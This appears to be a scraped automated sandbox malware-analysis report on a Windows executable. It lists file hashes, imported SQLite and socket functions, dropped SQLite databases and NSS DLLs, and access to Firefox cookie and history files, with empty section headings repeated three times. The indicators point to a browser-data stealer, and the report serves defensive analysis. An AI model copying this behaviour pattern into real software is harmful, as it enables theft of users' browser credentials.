Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0D60 sqlite3_bind_parameter_name,	0_2_6CEA0D60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC8EA0 sqlite3_clear_bindings,	0_2_6CDC8EA0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CEA0B40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC6410 bind,WSAGetLastError,	0_2_6CDC6410
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC60B0 listen,WSAGetLastError,	0_2_6CDC60B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDCC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CDCC050
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC6070 PR_Listen,	0_2_6CDC6070
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDCC030 sqlite3_bind_parameter_count,	0_2_6CDCC030
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD522D0 sqlite3_bind_blob,	0_2_6CD522D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC63C0 PR_Bind,	0_2_6CDC63C0

ID:	1543864
Product:	CloudBasic
Start time:	15:15:12
Start date:	28.10.2024
Sample:	9JtNIXVedn.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	678f666b1f2e04b504d62430f8e95b64
SHA1:	d8484b6da5c0faf9cb0453f12d34b3c60f03fc69
SHA256:	b32b753d94dc0a02f097626fa793432be53d5927d30abc5490a2d44a055670e5
Filetype:	Win32 Executable (generic) a (10002005/4) 98.45%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AAFIDGCFHIEHJJJJECAKKJDBAF	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	507BA3B63F5856A191688A30D7E2A93A	1B799649D965FF1562753A9EB9B04AC83E5D7C57	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
C:\ProgramData\CBFBGCGI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	C1AE02DC8BFF5DD65491BF71C0B740A7	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
C:\ProgramData\CGCAKKKEGCAKJKFIIEGI	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\ECGDHDHJ	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	643AC1E34BE0FDE5FA0CD279E476DF3A	241B9EA323D640B82E8085803CBE3F61FEEA458F	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
C:\ProgramData\EGDBFIIECBGDGDGDHCAK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\FIDGHIIECGHDHJKFCAEGIJDGCB	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\GDBKKFHIEGDHJKECAAKKEBAFIJ	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\HIIIDAKKJJJKKECAKKJE	ASCII text, with very long lines (1765), with CRLF line terminators	4580799F1DC5720A7EC1766400E98740	92FD30F47EC545245B934EA492B3C64D5E609AA9	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
C:\ProgramData\KKEBKJJDGHCBGCAAKEHDBAEGHD	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	7A03CC0EAD0AEFF210C3E60823AAA5EC	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report
9JtNIXVedn.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report 9JtNIXVedn.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
9JtNIXVedn.exe

Malware Threat Intel
Provided by